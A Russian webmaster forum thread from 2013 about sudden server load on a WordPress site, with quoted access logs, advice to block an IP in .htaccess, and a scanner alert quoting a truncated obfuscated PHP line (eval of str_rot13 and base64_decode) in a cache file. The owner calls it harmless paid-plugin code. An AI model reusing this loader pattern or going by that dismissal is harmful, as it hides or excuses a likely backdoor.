помогите с нагрузкой на сервер!

15

Red_Virus

6 февраля 2013, 08:21

#11

redfox1986:
вот сегодня скинули логи,
вот нашел часто выполняющиеся запросы


сайт.ru 2a03:6f00:1::b039:d17b - - [04/Feb/2013:23:04:35 +0400] "GET /wp-content/plugins/smli/handler.php?method=w&reindex=true HTTP/1.0" 200 - "-" "-"

сайт.ru 2a03:6f00:1::b039:d17b - - [04/Feb/2013:23:04:33 +0400] "GET /wp-content/plugins/smli/handler.php?method=w&reindex=true HTTP/1.0" 200 - "-" "-"

сайт.ru 2a03:6f00:1::b039:d17b - - [04/Feb/2013:23:04:31 +0400] "GET /wp-content/plugins/smli/handler.php?method=w&reindex=true HTTP/1.0" 200 - "-" "-"

сайт.ru 2a03:6f00:1::b039:d17b - - [04/Feb/2013:23:04:33 +0400] "GET /wp-content/plugins/smli/handler.php?method=w&reindex=true HTTP/1.0" 200 - "-" "-"

сайт.ru 2a03:6f00:1::b039:d17b - - [04/Feb/2013:23:04:34 +0400] "GET /wp-content/plugins/smli/handler.php?method=w&reindex=true HTTP/1.0" 200 - "-" "-"

сайт.ru 2a03:6f00:1::b039:d17b - - [04/Feb/2013:23:04:31 +0400] "GET /wp-content/plugins/smli/handler.php?method=w&reindex=true HTTP/1.0" 200 - "-" "-"

сайт.ru 2a03:6f00:1::b039:d17b - - [04/Feb/2013:23:04:35 +0400] "GET /wp-content/plugins/smli/handler.php?method=w&reindex=true HTTP/1.0" 200 - "-" "-"

это логи access
+ в логах ошибок нашел такое


[Mon Feb 04 21:38:14 2013] [error] [client 2a03:6f00:1::b039:d17b] PHP Warning:  Invalid argument supplied for foreach() in /home//public_html/wp-content/plugins/smli/handler.php on line 86

порядко 200 строк

могло ли это вызвать нагрузку в 100 раз?

да и еще сегодня заметил странную активность с одного айпи неподскажите что может быть это ?

собственно тама еще больше, почти весь сайт

Попробуйте заблокировать ip средствами iptables было у меня тоже как то положили весь бекенд заблочил нагрузку как рукой сняло

R1

39

redfox1986

6 февраля 2013, 08:23

#12

если вы про этот айпи 2a03:6f00:1::b039:d17b то это айпи самого сервера моего, если про 91. ...... то посмотрю будет ли еще появлятся, возможно уже все просканировал и больше непоявится

15

Red_Virus

6 февраля 2013, 08:24

#13

redfox1986:
если вы про этот айпи 2a03:6f00:1::b039:d17b то это айпи самого сервера моего, если про 91. ...... то посмотрю будет ли еще появлятся, возможно уже все просканировал и больше непоявится

про 91 уж очень часто он долбит странички вашего сайта

R1

39

redfox1986

6 февраля 2013, 08:43

#14

а как попасть в этот iptables у меня виртуальных хостинг(

15

Red_Virus

6 февраля 2013, 09:14

#15

redfox1986:
а как попасть в этот iptables у меня виртуальных хостинг(

Попробуйте средствами веб сервера htaccess например

60

izyalex

6 февраля 2013, 13:19

#16

handler.php?method=w&reindex=true поставьте поменьше интервал выполнения

91.81.77.242 заблочтьте в .htaccess

Deny from 91.81.77.242

Сpanel хостинг (http://bit.ly/Vjwlfl) и ISPmanager хостинг (http://bit.ly/11NnOqJ) от 119р./мес VIP Премиум хостинг (http://bit.ly/VibYQ9) в Москве, 1000р./мес и не парюсь

M

173

michaek

6 февраля 2013, 13:39

#17

redfox1986:
Найдены длинные зашифрованные последовательности в PHP или подключение внешних файлов. Подозрение на вредоносный скрипт:
/home//public_html/maxsite-cache.php
<?php $kdd9391e7490="base6\64_decode";$j878723423f5c3ba26da="str_rot�";@|eval($j878723423f5c3ba26da($kdd9391e7490("IHNoYXBndmJhIEIoKXtlcmdoZWEgJ9Ch0LrRg

я этот самый кеш не видел, это его нормальный код? :D

R1

39

redfox1986

6 февраля 2013, 13:41

#18

michaek:
я этот самый кеш не видел, это его нормальный код? :D

да, он платный, и наверно владелещь чтото зашифровал

В 2023 году Одноклассники пресекли более 9 млн подозрительных входов в учетные записи

Что делать, чтобы попасть в ответы Google Bard